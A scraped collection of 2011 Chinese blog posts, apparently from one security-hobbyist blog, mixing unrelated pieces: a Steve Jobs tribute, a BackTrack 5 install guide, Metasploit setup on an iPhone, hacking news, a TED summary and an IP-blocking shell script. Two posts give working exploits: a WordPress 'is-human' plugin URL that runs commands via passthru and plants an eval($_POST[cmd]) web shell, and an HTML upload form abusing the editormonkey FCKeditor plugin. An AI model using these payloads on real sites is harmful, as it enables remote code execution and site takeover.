没有乔布斯，就没有1977年的Apple II、1984年的Macintosh、1998年的iMac、2001年的iPod、2007年的iPhone和2010年的iPad。

　　乔布斯能如此成功，应有八个原因：一、预测业界趋势；二、大胆使用最先进的技术；三、打造崭新的商业模式；四、凝聚一流人才；五、憧憬用户尚不自觉的需求；六、永不停息的自我超越；七、设计每个细节都近乎完美的产品；八、口若悬河地说服用户情不自禁地爱他的产品。一般能驾驭两三个上述点就可能很成功，但乔布斯做到了这八点。

　　细看苹果的成功，这些要素显露无遗。苹果在设计产品时有勇气利用当前最先进的技术。比如，iPhone首次将桌面操作系统移植到手机上，又采用了多点触控技术、动力加速器以及GPU。在工业设计和用户体验方面，乔布斯自己就是苹果最挑剔的用户，他会关注到细微像素的差异，在意机箱里数据线的排列是否美观。

　　在商业模式上他也大胆创新。苹果从2001 年开始运营苹果店，当时整个行业都在追随戴尔的直销模式，因此苹果店模式引人质疑。但是，现在单看2009年的官方数据，就已经足以证明乔布斯的成功：一家普通苹果店的“每平方米销售额”为4.3万美元，相当于同样面积的5家百思买。

　　对于苹果公司，创新则意味着企业的成功。凭借突破性创新，过去十年里苹果改变的产业包括音乐、手机、数码产品零售，这种创新带来的领先同行两三年的优势，意味着一到两年的暴利。

　　但乔布斯也并非完人，起初他想大权独揽。除了一批“死党”，公司其他员工都无法容忍他那恃才傲物、目中无人的态度。终于，他被逐出公司。

　　重回苹果后，乔布斯成为一个更均衡、更好的领导者。一方面，乔布斯保持苹果在人机界面等领域的领先地位；另一方面，乔布斯针对用户的实际需要，用“均衡”而不是“完美”的思想对苹果产品进行全面改造。

　　苹果在消费电子市场上大获成功的第一个产品iPod，便是始于这种“均衡”思想：工业设计既“酷”又“炫”，但更重要的是全面支持与PC机及Windows等主流平台的连接。

　　请允许我用郭去疾对乔布斯的一段评语作为结束：你可以出身卑微，但必须卓然不群，纵使你将众叛亲离，也注定要重头再来。最迷人的剧情不是后来居上，而是王者归来；最伟大的战局不是尖峰对决，而是独孤求败；最完美的谢幕不是激流勇退，而是戛然而止。美人难免迟暮，英雄方能不朽。浪花淘尽，正是好处，却是了处。

文章地址:http://blog.nodll.com/2011/10/10/apple-ceo/Pray.html

下载地址：http://www.backtrack-linux.org/downloads/

BT5出了有段时间了，拿出来研究会。

与bt4相比，BT5不论从内核上还是应用程序上都进行了升级。bt5同时可以选择下载gnome或者kde桌面系统，而传统bt4默认的是 kde。bt5基于Ubuntu Lucid LTS.Kernel 2.6.38，在安装上也方便了很多，尤其对于中国用户，可以选择中文安装过程。

bt5改之前的黑色调，转为暗红，还是那潇洒的飞龙，在红色底纹上更显杀气。

记录一下vmware虚拟机中安装bt5：

1.首先下载bt5的32位iso文件,选用了gnome桌面系统。（64位的毕竟还是在一些软件支持性上有待改善，所以还是选择32位的保险）

2.新建一个虚拟机，选择typical设置，安装源选择刚刚下载的iso文件

这里指定的磁盘大小并不是虚拟机实际占用磁盘大小，而是它最大使用量，实际值会根据在虚拟机中安装的软件的多少进行动态的变化，所以指定大点没有关系，只要你实际在虚拟机里面不要太狠装太多东西。

虚拟机使用的内存尽量大一些，这样可以有效提高虚拟机运行的速率。现在电脑内存都够大，指定1G不会影响主机的速度。

3.启动新建的虚拟机

在这个界面直接回车，进入下一个界面

可以看到bt5的界面还是有些变化的，选择第一个选项进入

用户名还是root，初始密码是toor，登录后输入startx启动桌面系统。bt5的登录提示有明显改善，用颜色标记了需要输入的命令

进入桌面系统后，双击桌面上的 install BackTrack,启动硬盘安装程序：

这里就选用使用整个磁盘，让系统自动进行文件系统分配。

4.重新启动系统，注意在启动过程中会提示移除磁盘文件。

5.默认bt5是没有启动网络的，所以启动后需要手动启动网络。

启动网络方法比较多：（第一种）命令行下输入：start networking;（第二种）先用命令：ifconfig eth0 up，然后使用命令：dhclient eth0。

在这里需要注意虚拟的网络配置。个人建议直接用Bridge方式，因为就相当于直接用物理网卡。

启动了网络之后，最好执行一下：apt-get update来更新一下bt5的系统模块。当然最新发布的东西，更新不会太多，哈哈

6.安装Vmware Tools：

安装vmware tools的目的是为了让系统更好的在vmware上运作，可以让桌面系统自动适应虚拟机窗口大小，而且可以直接把自动启动网络加入到系统中，下次启动bt5时就不用再手动启动网络了。

在vmware的菜单栏选择VM–>install vmware tools。这时桌面就会弹出一个VMware tools光盘图标，并自动打开这个目录。将这个目录下的文件拷贝到/home下（目标目录自己定）。

注意：有时在新建虚拟机的时候，在系统选择时如果选择了other，可能会出现vmware菜单栏下安装vmare tools的选项不可用，变成vmare tools unavailable。这时只要把系统改成ubuntu就可以了。

使用tar -zxf VM*命令将刚刚拷贝的文件解压，进入解压目录后，运行：./vmware-install.pl，然后一路确认回车就ok啦。

安装完成后，重新启动系统，就会发现桌面也能自适应，网络也自动启动了。大功基本告成。

7.安装中文支持

虽然刚刚安装的时候选择中文安装，但bt5并不会自动安装中文支持，所以在bt5上网浏览中文网页的时候发现一堆小框框。

在命令行下输入：

apt-get install language-pack-zh language-support-zh

安装好中文支持，再浏览中文网页就发现正常了。

安装了以上中文支持会默认安装了ibus中文输入法，不过在调用中文输入前先要启动ibus deamon，然后在ibus中添加中文输入，这样就可以用ctrl+backspace来调用中文输入了。

如果要把ibus在启动桌面系统的时候加入自动启动，可以在system–>preferences–>startup application下添加：

8.为了方便管理，还可以安装ubuntu-tweak：

> apt-get install python-software-properties

> add-apt-repository ppa:tualatrix/ppa

> apt-get update

> apt-get install ubuntu-tweak

开始bt5之旅了~~总之，bt5比bt4在安装上简易了一些，相对需要手动处理的地方少了一些，而它本身基于ubuntu，所以ubuntu上的软件库都是可以使用的，这大大丰富了bt5的应用。

汉化

apt-get install language-support-zhlanguage-pack-zh
apt-getinstall language-selector
apt-getinstall language-selector -qt

到Settings->SystemSettings->Locale->add languages
单击select system language
安装 完成会有几个选项

最后在选择

add language ——第一个

剩下的就了事了。

文章地址:http://blog.nodll.com/2011/10/01/backtrack5-bt5/Pray.html

su root
password:
cd /private/var/
apt-get clean
wget http://updates.metasploit.com/data/releases/framework-3.7.2.tar.bz2
tar jxpf framework-3.7.2.tar.bz2
#apt-get remove ruby rubygems
#wget http://apt.saurik.com/dists/tangelo-0.9/main/binary-iphoneos-arm/debs/ruby_1.8.6-p111-5_iphoneos-arm.deb
#dpkg -i ruby_1.8.6-p111-5_iphoneos-arm.deb
#wget http://apt.saurik.com/dists/tangelo-0.9/main/binary-iphoneos-arm/debs/rubygems_1.2.0-3_iphoneos-arm.deb
#dpkg -i rubygems_1.2.0-3_iphoneos-arm.deb
#rm ruby*
cd msf3
svn update
./msfconsole

文章地址:http://blog.nodll.com/2011/10/01/iphone-metasploit/Pray.html

　　据悉，这个项目建立在开源模拟器QEMU的基础之上，项目负责人，同时也是参与早期iPhone越狱破解的克里斯·韦德(Chris Wade)表示，希望能完全模拟iOS应用在iPad第一代和iPhone4 A4 CPU上的运行状态。

　　这个项目并不轻松，尽快他们已经模拟出了CPU，但仍然必须模拟出对GPU、USB控制器、多重触屏控制器、内存、声音系统和所有二级部件(蓝牙芯片、GPS和指南针等)的支持。当完成硬件部分工作后，他们还要搞清楚怎样将这些东西加入引导项。可以说这是一项浩大的工程。

　　项目组希望“大部分iPad/iPhone应用”可以运行到非iOS设备上，在Windows、Mac和Android上建立真正的iOS模拟环境，使得安全工程师可以在不损害自身设备的情况下，研究iOS恶意软件。此外，从理论上将，这对反向工程师的工作也会产生帮助。

　　目前，韦德希望能为项目筹得20000美元。不过业内人士指出，就算iEmu项目走上正轨，并拿出了具体的时间规划表，Android用户也不要指望有大量的iOS应用可享用，毕竟硬件上还有很多问题需要解决。

文章地址:http://blog.nodll.com/2011/08/30/iemu-android/Pray.html

Strauchs称，监狱使用PLC控制牢门和其它设施上的锁和门。他指出，许多人并不知道监狱是如何设计的，因此这个问 题以前很少有人关注，他们不知道监狱使用了与离心机相同的PLC。PLC并不连接到互联网上，但控制PLC的电脑则可能联网。因此黑客可以通过感染病毒的 U盘或对监狱工作人员的邮箱发送钓鱼攻击，控制电脑并进而控制PLC。

Strauchs说，监狱的电子安全系统不仅仅控制门，还控制着对讲机、灯光控制、 视频监控、水和淋浴，等等。一旦控制了PLC(PDF)后黑客可以为所欲为，他们可以破坏整个系统。

文章地址:http://blog.nodll.com/2011/08/01/hackeropen/Pray.html

声明最后表示，这一切真的结束了。高兴的人很多，悲伤的人也不少。“Lulz Security – 我们全体6位成员祝大家2011年快乐，并为我们全球的同行欢呼”。

他们同时放出大量窃取的资料，包括50,000个游戏论坛成员密码、550,000战地测试用户密码、AT&T内部资料、200,000名黑客论坛成员密码、AOL内部资料和其他资料的名单。

文章地址:http://blog.nodll.com/2011/06/29/hackerlulzsec7-1/Pray.html

EXP：

server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error

其中，passthru(whoami)这里可以执行任意命令，比如ls，uname等。但uname -a， wget等无法执行，含有空格。需要base64编码。

EXP：

server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval($_POST[cmd]);error

被放入菜刀后，密码为cmd。

文章地址:http://blog.nodll.com/2011/05/19/wordpress-is-human-bug/Pray.html

美国华裔天才儿童邹奇奇演讲：“大人能从小孩身上学到什么？”

精彩观点：
1.”幼稚”这个词是常常从大人身上看到的。
2.孩子的大胆想象拓宽了可能性的疆界。
3.孩子喜欢挑战，大人应提供环境，鼓励尝试，但不要太过设限。
4.不要让孩子变成你们这样的大人， 而是比你们强的大人。

文章地址:http://blog.nodll.com/2011/05/17/ted-lecture/Pray.html

用Windows 2003系统的博友请注意了。

这BUG也就是Fckeditor的上传BUG。所以WP博友还是用自带的编辑器安全一点。

BUG关键字：plugins/editormonkey
 

EXP：

1
2
3
4
5

<form id="frmUpload" enctype="multipart/form-data" action=http://BUG网站/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

BUG上传后文件在：/UserFiles/tmdsb.txt
 
这个插件的博客很多，请赶快修复吧。

文章地址:http://blog.nodll.com/2011/05/15/wordpress-editormonkey-bug/Pray.html

#!/bin/bash
/www/MTCC/solution_ip.sh
/usr/bin/tail -1000 /var/log/lighttpd/access.log | grep -v 127.0.0.1 | awk '{print $1}' | awk '$1 {++S[$1]} END {for(a in S) print a, S[a]}' | sort -k 2 -n -r | awk '$2>10 {print $1}' > /www/MTCC/block_ip.txt
/www/MTCC/block_ip.sh
#!/bin/bash
for blockIp in `cat /www/MTCC/block_ip.txt`
do
echo "Blocking...$blockIp"
/sbin/iptables -I IPTABLES 4 -s $blockIp -j REJECT
done
#iptables -A INPUT -s $1 -j REJECT
#!/bin/bash
/usr/bin/tail -1000 /var/log/lighttpd/access.log | grep -v 127.0.0.1 | awk '{print $1}' | awk '$1 {++S[$1]} END {for(a in S) print a, S[a]}' | sort -k 2 -n -r | awk '$2>10 {print $1,$2}'

文章地址:http://blog.nodll.com/2011/04/25/shell-cc/Pray.html